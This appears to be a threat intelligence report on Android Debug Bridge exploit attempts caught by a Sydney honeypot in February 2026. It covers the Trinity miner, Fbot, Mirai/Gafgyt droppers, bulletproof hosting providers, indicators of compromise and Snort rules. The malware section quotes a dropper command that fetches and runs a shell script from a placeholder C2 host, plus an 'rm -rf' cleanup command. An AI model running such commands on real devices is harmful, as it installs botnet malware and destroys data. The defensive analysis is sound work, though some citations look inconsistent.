ADB lure on 5555 with the telemetry laid bare.

# ADB Exploit Attempts - Android Debug Bridge - NadSec - 2026-02

**Key Findings:**
*   **Persistent Cryptojacking Wars:** The NadSec ADBHoney sensor in Sydney observed a resurgence of the **Trinity botnet**, a peer-to-peer (P2P) malware specifically targeting Android devices via port 5555. This activity is characterized by the deployment of `com.ufo.miner` (a Monero miner) and aggressive "sanitization" scripts likely attributable to competing botnets like **Fbot**, which actively hunt and remove Trinity infections.
*   **Bulletproof Infrastructure Nexus:** A significant portion of the attack traffic originates from a small cluster of notorious "bulletproof" hosting providers. Specifically, **Railnet LLC (AS214943)**, **Pfcloud UG (AS51396)**, and **UAB Host Baltic (AS209605)** account for a disproportionate volume of dropper delivery and C2 activity. Research indicates these ASNs act as critical "threat activity enablers," providing stable infrastructure for commodity malware families including Mirai, Gafgyt, and Remcos.
*   **Industrialized Exploitation:** The dataset reveals highly automated kill chains involving multi-architecture payload delivery (ARM, MIPS, x86) via shell scripts (`w.sh`, `c.sh`). The presence of `busybox wget` and `curl` commands in the ADB shell logs confirms the attackers are leveraging native Android binaries to fetch payloads from staging servers.
*   **Global Scanning Ecosystem:** While the attacks terminate in Australia, the source infrastructure is global. Attribution points to a mix of compromised residential devices in China and Korea (likely infected by the worming module of Trinity) and purpose-bought scanning servers in Europe and the US hosted on abuse-tolerant networks.

## 1. Executive Summary

This report details a comprehensive threat intelligence analysis of Android Debug Bridge (ADB) exploit attempts observed by the NadSec T-Pot honeypot infrastructure in Sydney, Australia, during February 2026. The analysis is based on a dataset of 1,312 original indicators, focusing on a smart sample of 331 IP addresses and 156 file hashes.

The research identifies two distinct but overlapping threat categories targeting the ADB interface (TCP/5555). The first is a **cryptomining campaign** driven by the Trinity botnet, which leverages P2P propagation to install the `com.ufo.miner` application. The second is a classic **IoT botnet recruitment** drive, likely by Mirai or Gafgyt variants, utilizing shell script droppers to enlist devices into DDoS armies.

A critical finding of this report is the mapping of the attacker infrastructure to specific "bulletproof" hosting providers. The analysis confirms that the attackers are not operating from random compromised hosts alone but are utilizing paid, resilient infrastructure provided by entities such as **Railnet LLC** and **Pfcloud UG**. These providers have a documented history of shielding cybercriminal operations from takedown requests. This report provides a deep dive into these networks, the malware families involved, and actionable mitigation strategies for protecting Android-based IoT assets.

## 2. Statistical Overview

The following statistics are derived from the full NadSec dataset for February 2026. The data indicates a highly targeted campaign focused almost exclusively on the ADB protocol.

### 2.1 Aggregate Metrics
| Metric | Count | Notes |
| :--- | :--- | :--- |
| **Total Indicators** | 1,312 | |
| **Top Port** | 5555 (TCP) | 88% of all enriched indicators are associated with ADB. |
| **Primary Tag** | `adbhoney` | 100% of data originates from the ADBHoney sensor. |
| **Malware Tags** | `dropper` (199), `sample` (156) | High volume of payload delivery attempts. |

### 2.2 Top Attacking Infrastructures (Based on IOC Sample)
The analysis of the sampled IPs reveals distinct clusters of Autonomous System Numbers (ASNs) responsible for the majority of the traffic.

| ASN | Organization | Country | Classification | Activity Profile |
| :--- | :--- | :--- | :--- | :--- |
| **AS214943** | Railnet LLC | US/KY | **Bulletproof/Front** | High-volume scanning, Malware Hosting |
| **AS51396** | Pfcloud UG | DE/NL | **Bulletproof** | Payload delivery (`w.sh`), Exploit hosting |
| **AS209605** | UAB Host Baltic | LT | **Bulletproof** | Upstream transit for malicious networks |
| **AS215925** | Vpsvault.host Ltd | GB/US | **Bulletproof** | Malware hosting, VPS abuse |
| **AS4134** | Chinanet | CN | **Residential/Compromised** | Infected devices (Botnet nodes) |
| **AS4837** | China Unicom | CN | **Residential/Compromised** | Infected devices (Botnet nodes) |
| **AS14061** | DigitalOcean | US/NL | **Cloud Abuse** | Reconnaissance scanners |

## 3. Infrastructure Deep Dive

This section analyzes the specific hosting providers facilitating these attacks. The data suggests a reliance on "Threat Activity Enablers" (TAEs)—providers that offer stability to malicious actors through permissive abuse policies.

### 3.1 Railnet LLC (AS214943)
**Classification:** Legal Front for Bulletproof Hosting
**Observed IPs:** `130.12.180.65`, `130.12.180.80`

Railnet LLC appears frequently in the dataset as a source of scanning and attack traffic. Research indicates that Railnet LLC is a shell company, likely registered in Kentucky, acting as a legal front for **Virtualine Technologies**, a Russia-linked bulletproof hosting provider [cite: 1, 2].
*   **Operational Role:** Railnet's infrastructure has been observed supporting over 30 malware families, including Remcos RAT, RedLine Stealer, and various botnets [cite: 2, 3].
*   **Connection to Abuse:** The provider often leases prefixes to other questionable entities and is routed through upstream providers like **aurologic GmbH**, which creates a "safe harbor" for malicious traffic [cite: 2, 3]. The activity observed in the ADBHoney logs (high-frequency scanning) is consistent with mass-scanning servers often hosted on such networks to identify vulnerable IoT devices for botnet recruitment.

### 3.2 Pfcloud UG (AS51396)
**Classification:** Bulletproof / High-Risk Hoster
**Observed IPs:** `45.135.194.37`, `176.65.139.8`, `192.109.200.24`

Pfcloud UG (haftungsbeschränkt) is identified as a critical node in the attack chain. The dataset shows IPs in this ASN hosting the payload delivery scripts (e.g., `w.sh`, `c.sh`) used to infect Android devices.
*   **Reputation:** Pfcloud UG is widely recognized in threat intelligence circles as a haven for malicious activity. It has been linked to the hosting of **GootLoader** and **SpyNote** distribution infrastructure [cite: 4].
*   **Infrastructure:** It shares peering and transit characteristics with other high-risk networks like **Prospero OOO** and **Bearhost**, often utilized by Russian-language cybercrime forums [cite: 4].
*   **Behavior in Campaign:** In this specific ADB campaign, Pfcloud IPs are used as staging servers. The attackers execute commands via ADB to download shell scripts from these IPs, which then fetch the final binary payloads. The persistence of these IPs in the dataset suggests they are resilient to standard abuse reporting.

### 3.3 UAB Host Baltic (AS209605)
**Classification:** Malicious Upstream Transit
**Observed IPs:** `91.224.92.177`, `141.98.10.25`

UAB Host Baltic is a Lithuania-based provider that frequently appears as the upstream transit for other abusive networks, including **BtHoster** and **Skynet Network Ltd** [cite: 5, 6].
*   **Nexus of Evil:** This network is a known transit hub for Mirai variants, Cobalt Strike C2s, and brute-force infrastructure. It often announces prefixes previously associated with other high-risk regions to obfuscate the origin of attacks [cite: 5].
*   **Role:** The IPs observed (`91.224.92.177`) attempted to execute busybox wget commands, indicating they are either compromised servers or purpose-built attack nodes leasing bandwidth from Host Baltic.

### 3.4 Residential and Commercial ISP Abuse
**Classification:** Compromised Devices (The Botnet itself)
**Observed ASNs:** China Unicom (AS4837), Korea Telecom (AS4766), Chinanet (AS4134).

A significant volume of traffic, particularly that involving the `trinity` malware commands, originates from residential ISPs in East Asia.
*   **Trinity's P2P Nature:** The **Trinity** botnet (discussed in Section 4) utilizes a Peer-to-Peer (P2P) spreading mechanism. Once a device (e.g., a smart TV or Android box) is infected, it scans for other devices on port 5555 to propagate [cite: 7, 8].
*   **Attribution:** The traffic from IPs like `203.229.224.194` (Korea Telecom) and `112.224.193.160` (China Unicom) represents the *victims* of the botnet acting as new infection vectors. This confirms the worm-like behavior of the campaign.

## 4. Malware Analysis

The dataset contains hashes and file references that allow for high-confidence attribution to specific malware families.

### 4.1 Trinity Botnet & com.ufo.miner
**Dominant Family:** Trinity (Coinhive/XMR Miner)
**Key Artifacts:** `com.ufo.miner`, `trinity`, `ufo.apk`

The most distinct activity in the logs is the command sequence: `pm path com.ufo.miner` followed by execution attempts of a binary named `trinity`.
*   **Identification:** The file hash `0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257` is positively identified as **ufo.apk**, a core component of the Trinity botnet [cite: 8, 9].
*   **Functionality:** Trinity is a cryptomining botnet that targets Android devices via open ADB ports. It installs a mining application (`com.ufo.miner`) that utilizes the device's CPU to mine Monero (XMR). The malware creates a headless app (no user interface) that relies on Android WebView to execute JavaScript-based mining code (originally Coinhive) [cite: 9, 10].
*   **P2P Spreading:** Unlike traditional botnets that rely solely on a central C2, Trinity employs a P2P mechanism. The `trinity` binary (Hash: `71ecfb...` [cite: 8]) scans for other targets and issues `adb connect` commands to spread the infection laterally across the internet [cite: 8, 9].
*   **Persistence:** The malware attempts to establish persistence by using `nohup` to keep the miner running and may use boot receivers to restart upon device reboot [cite: 8].

### 4.2 The "Fbot" Intervention
**Likely Actor:** Fbot (Vigilante/Competitor)
**Key Artifacts:** `rm -rf /data/local/tmp/*`, Removal of `com.ufo.miner`

The logs show repeated attempts to execute `rm -rf /data/local/tmp/*` or commands that specifically target the removal of `com.ufo.miner`. This behavior is characteristic of **Fbot**, a distinct botnet known to "clean" devices of Trinity infections.
*   **Behavior:** Fbot is a Satori/Mirai-based variant that utilizes blockchain DNS (EmerDNS). Notably, it contains specific routines to search for and uninstall `com.ufo.miner` [cite: 7, 11, 12].
*   **Motivation:** While it acts as a "vigilante" by removing the miner, Fbot itself is malicious and maintains backdoor access to the device. The "cleaning" is likely an anti-competitive measure to free up system resources for its own operations or simply to secure the device for its own botnet [cite: 7, 11].

### 4.3 Mirai / Gafgyt Variants
**Family:** Mirai / Gafgyt (Bashlite)
**Key Artifacts:** `w.sh`, `c.sh`, `busybox wget`, `arm7`, `mips`

A substantial portion of the attacks involves the classic IoT malware infection sequence:
1.  **Exploit:** Access via open ADB (no authentication required).
2.  **Dropper:** Execute `cd /data/local/tmp; busybox wget http://[C2_IP]/w.sh; sh w.sh`.
3.  **Payload:** The script (`w.sh`) downloads binaries for multiple architectures (ARM, MIPS, x86, PPC) to ensure the malware runs regardless of the underlying hardware [cite: 13, 14].
4.  **Execution:** The binary connects to a C2 server to receive DDoS commands.

The IP `94.156.152.67` is specifically linked to hosting **Gafgyt/Bashlite** and **Mirai** payloads (e.g., `xdlol.arm7`) [cite: 15, 16]. This indicates a standard DDoS botnet recruitment campaign running parallel to the cryptomining activity.

## 5. Campaign Analysis

### 5.1 Campaign 1: The "Miner Wars" (Trinity vs. Fbot)
This campaign is characterized by a territorial struggle for control over vulnerable Android resources.
*   **Target:** Smart TVs, Android TV boxes, and smartphones with ADB enabled (often for debugging or side-loading apps) [cite: 7].
*   **Modus Operandi:** The Trinity botnet infects a device, installs `ufo.apk` to mine Monero, and then uses the infected device to scan for new victims. Simultaneously, Fbot-infected devices scan the same range, identify Trinity infections, and attempt to remove them to secure the device for the Fbot network.
*   **Indicator:** The presence of `pm path com.ufo.miner` in the logs is a fingerprint of this specific conflict.

### 5.2 Campaign 2: Infrastructure Leasing (DDoS Botnets)
This campaign utilizes the bulletproof hosting infrastructure (Railnet, Pfcloud) to distribute generic IoT malware.
*   **Attribution:** The coordinated use of specific bulletproof hosting providers suggests a financially motivated actor renting "bulletproof" servers to host their C2 and payload delivery sites. This acts as a "Loader-as-a-Service" model where the infrastructure provider (Railnet/Virtualine) is distinct from the botnet operator.
*   **Goal:** Recruitment of devices into a DDoS botnet (likely Mirai-based) to be rented out for stresser/booter services.

## 6. Detection & Mitigation

### 6.1 Network Detection
*   **Port Monitoring:** Flag any inbound traffic to **TCP/5555** (ADB) from the internet. This port should strictly be blocked at the perimeter firewall.
*   **Payload Detection:** Monitor HTTP traffic for requests to URIs ending in `.sh` (shell scripts), `.arm`, `.mips`, `.x86` (ELF binaries), or specific filenames like `ufo.apk` or `trinity`.
*   **Snort/Suricata Rule Example:**
    ```bash
    alert tcp $EXTERNAL_NET any -> $HOME_NET 5555 (msg:"ET EXPLOIT Android Debug Bridge (ADB) Payload Download Attempt"; content:"cd /data/local/tmp"; content:"wget"; sid:1000001; rev:1;)
    alert tcp $EXTERNAL_NET any -> $HOME_NET 5555 (msg:"ET MALWARE Trinity Botnet Check"; content:"pm path com.ufo.miner"; sid:1000002; rev:1;)
    ```

### 6.2 Host-Based Mitigation
*   **Disable ADB:** On Android devices (TVs, phones), ensure "USB Debugging" or "Network Debugging" is disabled in Developer Options unless explicitly needed.
*   **Process Monitoring:** Look for processes named `trinity`, `minerd`, or package names `com.ufo.miner`.
*   **File Artifacts:** Check `/data/local/tmp/` for suspicious shell scripts (`w.sh`, `init.sh`) or binaries.

### 6.3 Infrastructure Blocking
Block ingress and egress traffic to the following high-risk ASNs and IPs identified in this report:
*   **Block ASN:** AS214943 (Railnet LLC), AS51396 (Pfcloud UG), AS209605 (UAB Host Baltic), AS215925 (Vpsvault.host).
*   **Block IPs:** `94.156.152.67` (Malware Payload Host), `185.242.226.39` (Railnet Scanner), `45.135.194.37` (Pfcloud Exploit Source).

## 7. IOC Appendix

### 7.1 Key IP Indicators
| IP Address | ASN | Org | Context |
| :--- | :--- | :--- | :--- |
| **94.156.152.67** | AS208046 | ColocationX Ltd | **C2 / Payload Host.** Serves `w.sh`, `c.sh`, `xdlol.arm7` (Gafgyt/Mirai). [cite: 15, 16] |
| **45.135.194.37** | AS51396 | Pfcloud UG | **Exploit Source.** Executes busybox wget commands. Linked to bulletproof hosting. [cite: 2, 4] |
| **91.224.92.177** | AS209605 | UAB Host Baltic | **Attacker.** Downloads payloads from 94.156.152.67. Upstream for malicious networks. [cite: 5] |
| **130.12.180.65** | AS214943 | Railnet LLC | **Scanner.** High volume scanner. Front for Virtualine (Bulletproof). [cite: 2] |
| **203.229.224.194**| AS4766 | Korea Telecom | **Infected Device.** Spreading Trinity malware (`nohup ... trinity`). |
| **112.224.193.160**| AS4837 | China Unicom | **Infected Device.** Spreading Trinity malware. |

### 7.2 File Hashes (SHA256)
| SHA256 | Filename/Context | Family |
| :--- | :--- | :--- |
| `0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257` | `ufo.apk` | **Trinity / CoinMiner** [cite: 8, 17, 18] |
| `71ecfb7bbc015b2b192c05f726468b6f08fcc804c093c718b950e688cc414af5` | `trinity` | **Trinity Botnet Binary** [cite: 8, 9] |
| `d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0` | `nohup` | **persistence tool** (Trinity) [cite: 8] |
| `5099d27284c2257d2983450585cbd4bede6475519755508047e213d985cbc7c9` | `sample.raw` | **ADB Dropper** |
| `b15b620d27f7d00cfb31ac26c2c4a07c19bcc9e1df04f1f7c6b25d7c0c3f551d` | `sample.raw` | **ADB Dropper** |

## 8. MITRE ATT&CK Mapping

*   **T1133 - External Remote Services:** Exploitation of the exposed Android Debug Bridge (port 5555).
*   **T1059.004 - Command and Scripting Interpreter: Unix Shell:** Use of shell scripts (`w.sh`, `c.sh`) to download and execute payloads.
*   **T1105 - Ingress Tool Transfer:** Downloading `ufo.apk` and `trinity` binaries using `wget`/`curl`.
*   **T1496 - Resource Hijacking:** Unauthorized cryptocurrency mining using `com.ufo.miner`.
*   **T1016 - System Network Configuration Discovery:** Scanning local and external networks for other devices to infect (P2P propagation).
*   **T1562.001 - Impair Defenses:** Fbot/Trinity removing competing malware (`rm -rf`, uninstalling `com.ufo.miner`).

## 9. References
[cite: 19] Malwarebytes, "IP 91.92.241.197 malware" [cite: 19]
[cite: 20] Avast Community, "Malware threat IP" [cite: 20]
[cite: 11] Zimperium, "Fbot Botnet Threat Details" [cite: 11]
[cite: 12] Netlab 360, "Fbot cleaning ADBMiner" [cite: 12]
[cite: 13] Lumen, "The Resilient Satori Botnet" [cite: 13]
[cite: 10] Cyware, "Cryptominer app infects Android devices" [cite: 10]
[cite: 9] Quick Heal, "Trinity Miner using open ADB port" [cite: 9]
[cite: 8] Keysight, "Trinity P2P Malware Over ADB" [cite: 8]
[cite: 21] IPIP.NET, "United Kingdom ASNs" [cite: 21]
[cite: 22] Internet Weather, "ASN Watchlist" [cite: 22]
[cite: 17] MalwareBazaar, "Sample 0d3c68..." [cite: 17]
[cite: 18] BlackAlps, "Cryptocurrency malware for Android" [cite: 18]
[cite: 5] Intrinsec, "BtHoster / UAB Host Baltic Analysis" [cite: 5]
[cite: 2] Recorded Future, "Malicious Infrastructure / Railnet LLC" [cite: 2]
[cite: 4] GreyNoise, "Pfcloud UG / Bulletproof Hosting" [cite: 4]
[cite: 2] Recorded Future, "Railnet LLC and Virtualine" [cite: 2]
[cite: 8] Keysight, "Trinity Indicators of Compromise" [cite: 8]
[cite: 15] ThreatFox, "IOC 94.156.152.67" [cite: 15]
[cite: 16] ANY.RUN, "Analysis of 94.156.152.67" [cite: 16]

**Sources:**
1. [breached.company](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF5GeuPoOEPUHtha5GFzh0hgzd5Qt5huluVMTqGpACOt29iD4_LOEKnR6ngo3lZ7k6bV9YDnb-ZhNYTHNN0WYYiUrXj6-hwARbWDyTQ2SdJS4aDX3kLnB_vuZNe076rvx30kc5gAqgs8m06JSchJKaiKx_VL1psttTdDla81ID9rWd4OWjzUkaZVV6UdvHdH-9B8vNgcOu6LgYDm6lpPaRPj7NFzCcYzMrI806noHqMwR_gbmWekbRmJac8)
2. [recordedfuture.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGO_wap8QZfLyKyjWI8QJyPVtu1Jb8Bs0v2X7VoBLIDq7k__wQoj_HD3yi8CYQUVLn2wgk3kmnumtFBy7zjhr4e36AkNOdCqJVaPIZ8XOzK-0IrV1cC5j6RSy-JoGr6R8yLaUdQA6MjLKYFz1UQl5v2IgSNdEhBiwZT0luK9MFqGbI_Flt2mifbD-4c1fHY0IdxHcUEjHQxQHs=)
3. [recordedfuture.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHTRv-n9Cjhjj70q0S7vuqMrrl-F127Yw_uvT8kn6wrQrA5slDXhyx9stqoTeCIu0q36DqllAbGQ4aJ0jG3Mm3DeDbD2paFZiz6u7hqqGWlx1vkYAMcXiuR_byj40r12TUudx3fxluwh8Asc7Sfsy9CI0EFn4fBie8gsn_WXl8zAA==)
4. [greynoise.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQH7aPIfHq0XqsTVz6E_sDebddixEZTRxhKZ6663JE3kT4wBTCAXCUVvp565V5hkJt2l666yk-DwtuoLM8CfRWP5zjwwmcQMxDwTF5mB23zv7u8yDyDJwmROQKG5f-NOOw8Oo_UiO00=)
5. [intrinsec.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHh-KUUlxCHo5-lygPZ1poTDeiuHd80QzDhV_NGZptHU4aS_HQIOqH0Y_xu3Es6wqWif6sGIDlFEUf7ncC1vSTAjEUs-WE2mclRyBVAmE_yzbGVUrmIi5Rc75E_tb09bRQqNu9xOACes2yyld828hTmxJt68MJhkzrVxahxsu1A_N4DNG35KGM4gOdn-SfliPAWf49OrdJHMuInRh02nUHf0n5Ui1Vb)
6. [intrinsec.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGk78JiYDZv0tshn1qG7Bt6dM_CH1PD6WuvKEw0ruhRA5UlR9b4c4prrk81rfMzDcCtYAi1pQVSyLQkII70G6aVO8JQDt-3UneJ4r86ZL9v6f_LhT-nHGXHYMgSn37FolVfX9eko_tDt4iXi3VQ1wYrqKgCarfhVcElDwN0UzdQdqHeHfW6l_WQjSygebQn0CQu3j99lSXzPhscZSI99KiTQkKLy1QgBy6K)
7. [zdnet.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGQjMDDBGIC06YWFnsNJItebEc50A6USapol5PSlwPtWWWY1z0sYVRbupDCsxSYGVXleMGEUZSDLULRCSJKx-u5lBF5fHSnxgCYM9lQh166zQ0M1Vg1hgPIyco1OMT3mSJmgakWxrk6N4bAFGIuN9PbEHVjjPG4mvqAxo54DRoeIY3OpPMzcD9788FdjeopwcoMfX43saT_P9wsWDTO6cYpb81-)
8. [keysight.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHRJNiURAMp6ryWrXdNQ8e4DwKrKyXiMjTmDE_oC1rfYe5F0mCvwSTHI91gFhD4UsgqLALfV36dvyUbPTMeAklLhFY718qGb9vSo4wO-wAe4MSxRPN5euomrbZyWaQNDtHbbROfOSrJrl2GNnIwFIK_PTF5M4gq3nNJn4dOhq0A61snF25KCXk=)
9. [quickheal.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF7K8h-9MdIHcEMmNGmY7LPz4qDAseiRGEzwEOe2nbLdC6jGzCPJCMhGm46UPy_HsHKnutC956Gs2b1ONtHCFhyrWS7aXHlIakS53_5pTrX18ADgC-9ftuudur2Jj8nQm_YA5uLfiy7kYfChzEeG5wNRIvHmDZ-HFu-L9tuNWtb0AowdcXKUz1r2FbZJOs=)
10. [cyware.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHpqRULdSmPQ9qjdBJ8GU4NrtSnBnDnOj_S_qZ5ZbABOULuAwkIaP4MwGAOc_jbkSyhzPBn6bMrbsnj-hHT1VNkY66vAI90MmL_0mYwCJuO0TLvNmzp2ugKfRS-ALEoUd0dCdRm6GdW4G2C44aSVFEKOmLcWKE8SNeoX8WOb4cVjxeYMf-j5Q9p4s6Q7YjbGzsC6AhEJ3WJ5qvWiiq87A==)
11. [zimperium.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHoJWUSRVQu4kLcID4UCB1x53XqtPR6LSyvXCt9OnxZPF4WH-WD7W614PmXc8hC_KRd7MfCoh-z4Cuwi3U1DEt368kWxbk_BsGySPoNBkWCDVp0qZxJ3vWt4NtaxbANrg==)
12. [360.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGVfwtJxIbcQkCCSKYz-jNQc7J2eoySfro8HNbiNU7gQ21P1kBp8LJKBAWlnZ19uYOd5Aqedv3EeZkYfiXJhod6bd5L5R6-j7ZurqB0K3nwcUV7GC_eCeN5j_VmFZ9rmiaVSRW8e8vjrAx48-j87gGSzZgbj8gk5OOUzD3RrFWt7herjg6S0skznNW34Cw-gLVHut8_sS46NAYX6ljAa_Y4bi_h)
13. [lumen.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHO1oCu_cHLXnGPvvlWMgcPIUtwi6RXpeaf_vzvLDxCSfje9PBsw_8fG_dvXAug91yIp06u9ThWi3WDQzfNF2LBKaAJF-ov2r9cgPonG5bGrIkRKrjPa2FIGEpy-tqKCjn-HVavuQ--7Q==)
14. [trendmicro.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGl_oBtJpT6aO14K0cQ2PBF5sGZPqqdBtfzQx3ViEVQl-WS_zdV_vtUrYNIRsi_qJoTeZVMG83DylI7Ep6wBEyetXr96McH9WYvG0bXB_qw63o1OO0bdVE91tOXopglFC_clvZ9y8dnzfLitohCIql2-smdM4WmWtXQ76uJv7pDb13RtLT7S_ZCRqKQYxzUNFhAuyRCkAHqdcJLn77eTsOIOw-IrRkc7jkRIWJsQAtrAo9ZsybjPt4fd54=)
15. [abuse.ch](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGQR3Ya3oYuPZ4wF86zcdrqB4cKtXZUK1jXMpT-t3dYZZ4BG75hufU65PEexL-QcM18gDzrNXlhiueIuTMoayPNtlNcRngGqrmA7ZQq0AMFXCHqjR9rLEDy5WrjLg==)
16. [any.run](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFbW-9A4mMUh7wrFUS_JbUZBE19eA6nt0dKKopFMleQ37TImAWydBRBKdN0z5QAgAetnYK-s2t1WznVM_hHHz_q8RaNbWk2WrIzZsbkvO5duSYm0isrWcw2kLXc3w4f5I79ro7Cs7dh8qH5DLkDH0R7841s4HPtV43rYCgpvY49mcYM_Ub3mNa8Xs2sT4OT2UU_hyixPzaXmx0MFIAvQ465x97j1S2EARCft6MmOsxjQ-4=)
17. [abuse.ch](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEsU3z-suuIMtZ0AMdgH9Wst9ajAbbf3CgQJvuMCtzH2tuyY5axeLoKexdHyngO6zPPuU28TrT299-J2M15PY-zeNpvgcHSfk_lpmPQFQoE-CGOPb-59VbQxFkEN51Xns8QOOrtYBjFNPhT7TtTIcLLAKroxep_hSjROSyLfQTOgEPdQtwZvVU-w5j7QsHBuHMRczoG6g==)
18. [blackalps.ch](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQE6IJawDfn6W5gHV9hJEWdCZRwMMOcE2ixh4bij82li8T4UuN11BAGd1CQlDBvwJOUw2vLbZPoZMRjjNzuxSM6PVvMl90TYDAz63WmaT41MP-qDpD_7fRT0cMd7Rgf105F4KKu1k6zS7ahxWCdLofknmHpBen_IBjj7VT3pNlSA)
19. [malwarebytes.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGCTUyDoIJCULZ0dSh6W-Z1StaLSdZjyHdNJjdxmVprbLnp3K0D3ZM4Ss35JQaaiuf1yDp6hnS5y_9v-9akmzQFkS5Kv1kcu5iw_8asyipckznJo1oJyovBnLNRT1EH6_YrCN_Ft6sMx9yQrK9U)
20. [avast.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFizpwVg7YzYMUKEn7MLtnQKDUKz4Ce5YRomOZYblXzG1OtkrDTO3wlYyp3biscLs_6Q2BteZ8YLeTtWqJEVeKLkFDeycEgkRha6YtEpRtDbPkh9EcDOmZ0Yyp9PV1e9iim-bh-6EqeSYMg2MR49qlWKUGIBwXw-LG7yM9TIYCs)
21. [ipip.net](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEgf9p3rQyRzQPmk5pd3o0YgMzsPYvOAriQCJjQB6547S9LTKHKQE5XcT6KWxo-YPDNiZiVzsXD8JGYgKNTr4Tf6SwwB3dPNEiRmDx9Si1FJ-x0)
22. [internetweather.net](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQE6np9LwFtQZ68YBeTFfyrYa8wwTTpegPzB9QzikR6_29nJUiXMv9wMyuTXBI8-Tfl70i7p1_hJiVgEN2ajw4-CWvCPm41K8McweG1HVSE5bGE=)